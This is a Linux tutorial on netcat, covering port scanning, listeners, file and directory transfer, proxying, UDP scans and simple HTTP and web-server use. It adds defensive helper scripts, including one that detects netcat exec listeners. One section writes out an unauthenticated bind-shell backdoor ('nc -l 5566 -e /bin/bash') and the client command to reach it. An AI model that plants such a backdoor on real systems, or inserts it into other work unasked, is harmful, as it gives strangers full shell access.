This comprehensive Linux guide expects that you run the following commands as the root user. If you decide to run the commands as a different user, ensure that the user has sudo access and that you precede each of the privileged commands with sudo.
netcat is a feature-packed networking utility which reads and writes data across networks from the command line. netcat was written for the Nmap Project and is the culmination of the currently splintered family of Netcat incarnations.
It works similarly to the cat command, but for the network. It reads or writes data from/to the network using the TCP and UDP protocols. It is one of the most powerful networking tools available to Linux users and is called the Swiss Army Knife of networking tools. It is most often used by networking specialists to monitor, test and send data across a network.
In this tutorial, we will show you the use of the netcat command with multiple examples.
Installing netcat Command
To install the netcat command on your Linux machine, you can run the following command:
On Debian Based Systems
$ apt install netcat
On Red-Hat Based Systems Or CentOS
$ yum install nmap-ncat
Following is the general syntax of the netcat command:
$ netcat [options] host port
OR
$ ncat [options] host port
OR
$ nc [options] host port
Using netcat For Port Scanning
netcat is most commonly used for port scanning. You can scan a single port as well as multiple ports or a range of ports. Use the option -z to scan for listening services without sending any data, and the option -v to get more detailed output.
$ nc -z -v 126.96.36.199 80
Warning: forward host lookup failed for 188.8.131.52.vultr.com: No address associated with name
184.108.40.206.vultr.com [220.127.116.11] 80 (http) open
If you want to display only the open ports, you can filter the output through the grep command. netcat writes its -v messages to standard error, so redirect them into the pipe with 2>&1. OpenBSD netcat reports an open port with the word "succeeded"; the traditional netcat that produced the output above reports "open", so grep for that word on those builds.
$ nc -z -v 18.104.22.168 80-300 2>&1 | grep succeeded
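Because the wording differs between builds, a small filter that understands both formats is more dependable than a fixed grep. The following is an added example, not part of the original tutorial; the function names and the sample scan output are constructed for illustration.

```shell
#!/bin/sh
# Added example: extract open port numbers from "nc -z -v" output,
# whichever of the two wordings the installed netcat uses.

open_ports() {
    awk '
        # OpenBSD netcat: Connection to HOST PORT port [tcp/http] succeeded!
        $1 == "Connection" && $2 == "to" && $NF == "succeeded!" {
            print $4; next
        }
        # Traditional netcat: NAME [ADDR] PORT (service) open
        NF >= 5 && $NF == "open" && $(NF-2) ~ /^[0-9]+$/ {
            print $(NF-2)
        }
    ' | sort -nu
}

# Constructed sample output mixing both formats, including refused ports
sample_scan_output() {
    cat <<'EOF'
(UNKNOWN) [192.168.100.1] 199 (smux) open
(UNKNOWN) [192.168.100.1] 81 (?) : Connection refused
web01.example.test [192.168.100.1] 80 (http) open
Connection to 192.168.100.1 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.100.1 port 23 (tcp) failed: Connection refused
Connection to 192.168.100.1 80 port [tcp/http] succeeded!
EOF
}

# Real use: nc -z -v HOST 80-300 2>&1 | open_ports
sample_scan_output | open_ports
```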
Listening To Inbound Connections
You can also use this command to listen for inbound connections to your system by using the option -l with a specific port to listen on.
$ nc -l port
$ nc -l 8080
Connecting To A System Remotely
You can connect to another system remotely using this command. You can run the command like below:
$ nc IP_Address Port
$ nc 192.168.1.1 80
Checking Server Software And Its Version
You can also use the netcat command to find the server software and its version by sending the "EXIT" command to the server on the default SSH port 22 like below:
$ echo "EXIT" | nc 22.214.171.124 22
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u6
Protocol mismatch.
Chatting With A Remote System
You can also use the netcat command to make a chat system between one host and another. First, you need to set up a host to listen on a specific port. Then you need to connect to that host using that port from your system.
From Server side
$ nc -l 4444
From Client Side
$ nc server-IP 4444
Replace "server-IP" with the IP of the host that is listening for an inbound connection.
Once the connection is established, you can start sending messages to the server. Those messages will be displayed on the terminal of the server.
You can also use the netcat command to send or receive files from one host to another.
For this, you first need to start the listener on the system on which the file is to be received.
$ nc -l 4444 > file.txt
Now, you can send the file from the other host using this port by running the command like this:
$ nc host-IP 4444 < file.txt
Replace "host-IP" with the IP of the host that is listening for the file to be received.
If you want to send a directory using the netcat command, you first need to make an archive of that directory using the tar command and then send it over using the netcat command:
$ tar czvf - /path/to/directory | nc host-IP 4444
Then you can receive the file and extract it using the command like this:
$ nc -l 4444 | tar xzvf -
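The listener above accepts a connection from any host that can reach port 4444 and extracts whatever it sends into the current directory. As an added example (not part of the original tutorial), the receiver can instead save the stream to a file, check the member names, and extract into a dedicated directory; the function names, archive name and sample member names are assumptions, and the check covers path names only.

```shell
#!/bin/sh
# Added example: vet a received archive before extracting it.
# Receive first with:  nc -l 4444 > incoming.tar.gz
# Then run:            safe_extract incoming.tar.gz ./incoming

# Read member names on stdin, print those that would land outside the
# extraction directory, and return 1 if any were found.
unsafe_members() {
    awk '
    {
        flagged = (substr($0, 1, 1) == "/")        # absolute path
        n = split($0, part, "/")
        for (i = 1; i <= n; i++)
            if (part[i] == "..") flagged = 1       # parent-directory component
        if (flagged) { print; bad = 1 }
    }
    END { exit (bad ? 1 : 0) }'
}

# safe_extract ARCHIVE DEST: list first, extract only if every name is safe
safe_extract() {
    archive=$1
    dest=$2
    if ! tar tzf "$archive" | unsafe_members >&2; then
        echo "refusing to extract $archive: unsafe member names" >&2
        return 1
    fi
    mkdir -p "$dest" && tar xzf "$archive" -C "$dest"
}

# Constructed member names: one safe, two that escape the target directory
printf '%s\n' 'directory/notes.txt' '../.ssh/authorized_keys' '/etc/cron.d/job' |
    unsafe_members || echo "archive would be rejected"
```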
Using netcat As Proxy
You can also use the netcat command as a proxy for your system.
$ nc -l 4444 | nc 192.168.100.1 40
Now all connections coming to our server on port 4444 will be automatically redirected to the 192.168.100.1 server on port 40. But since we are using a pipe, data can only be transferred in one direction. To be able to receive data back, we need to create a two-way pipe. Use the following commands to do so:
$ mkfifo 2way
$ nc -l 4444 0<2way | nc 192.168.100.1 40 1>2way
After this command, you will be able to send and receive data over the proxy.
Using UDP Ports
If you want to scan UDP ports, you can just add the option -u to the command:
$ nc -u -z -v 192.168.100.1 80-200
192.168.100.1: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.100.1] 200 (?) open
(UNKNOWN) [192.168.100.1] 199 (smux) open
(UNKNOWN) [192.168.100.1] 198 (?) open
(UNKNOWN) [192.168.100.1] 197 (?) open
(UNKNOWN) [192.168.100.1] 196 (?) open
(UNKNOWN) [192.168.100.1] 195 (?) open
(UNKNOWN) [192.168.100.1] 194 (irc) open
Because UDP is connectionless, netcat reports a port as open whenever no ICMP port-unreachable reply comes back, so a firewall that silently drops packets makes every port look open.
Similarly, you can add this option to any netcat command to use it with UDP ports.
Creating A Backdoor Using netcat Command
You can also use the netcat command to create a backdoor. This functionality is mostly used by hackers. You can run the command like this:
$ nc -l 5566 -e /bin/bash
The -e flag attaches bash to port 5566. A client that connects to port 5566 on the server then has complete access to the system via bash, with the privileges of the user who started the listener and without any authentication. OpenBSD netcat does not include the -e option. The client connects by running the command like this:
$ nc 192.168.100.1 5566
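From the defender's side, a listener started this way is visible in the process table. The following added example (not part of the original tutorial) flags nc, ncat and netcat processes started with -e or with Ncat's long forms --exec and --sh-exec; the function names and the sample process lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag netcat processes that hand a program to the network.
# Input format: one process per line as "PID USER COMMAND ARGS...", e.g.
#   ps -e -o pid= -o user= -o args= | flag_exec_listeners

flag_exec_listeners() {
    awk '
    {
        # Reduce /usr/bin/ncat to ncat before matching the program name
        n = split($3, path, "/"); prog = path[n]
        if (prog !~ /^(nc|ncat|netcat)(\.[a-z]+)?$/) next
        for (i = 4; i <= NF; i++)
            # -e alone or at the end of a short-option cluster such as -lve
            if ($i ~ /^-[A-Za-z]*e$/ || $i == "--exec" || $i == "--sh-exec") {
                print $1 " " $2 " " prog
                next
            }
    }'
}

# Constructed process listing: two exec listeners among ordinary processes
sample_ps() {
    cat <<'EOF'
  812 root     /usr/sbin/sshd -D
 2291 root     nc -l 5566 -e /bin/bash
 2310 alice    nc -l -k 4444
 2377 www-data /usr/bin/ncat -l 9001 --sh-exec /bin/sh
 2402 bob      nc -w 10 192.168.100.1 4444
 2450 bob      grep -e nc /tmp/notes
EOF
}

sample_ps | flag_exec_listeners
```

Each output line gives the PID, the owning user and the program name, which is enough to follow up with a look at the listening socket and the parent process.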
Running A Web Server With A Static Page Using netcat
You can also start a web server using the netcat command on a local host that will serve a static web page "sample.html".
First, make a new file with the name "sample.html" and copy the following code into the file.
<html>
  <head>
    <title>Test Page</title>
  </head>
  <body>
    <h1>Level 1 header</h1>
    <h2>Subheading</h2>
    <p>Normal text here</p>
  </body>
</html>
Then run the following command:
$ while true; do sudo nc -lp 80 < sample.html; done
After this, you can access the page by going to "http://server-IP.com/sample.html"
Setting The Connection Timeout
If we run the command in the listener mode, it will continue infinitely and will have to be terminated manually. But we can set up a timeout for a connection by using the option -w with the netcat command:
$ nc -w 10 192.168.100.1 4444
Making The Server Persistent
The server will terminate automatically when the client disconnects from it. To make the server keep listening for more connections even after a client disconnects, you can use the option -k with the netcat command:
$ nc -l -k 4444
Performing HTTP Request
You can also use this command to send various HTTP requests to a remote server.
For example, if you want to retrieve the netcat man page from the OpenBSD web site, run this command:
$ printf "GET /nc.1 HTTP/1.1\r\nHost: man.openbsd.org\r\n\r\n" | nc man.openbsd.org 80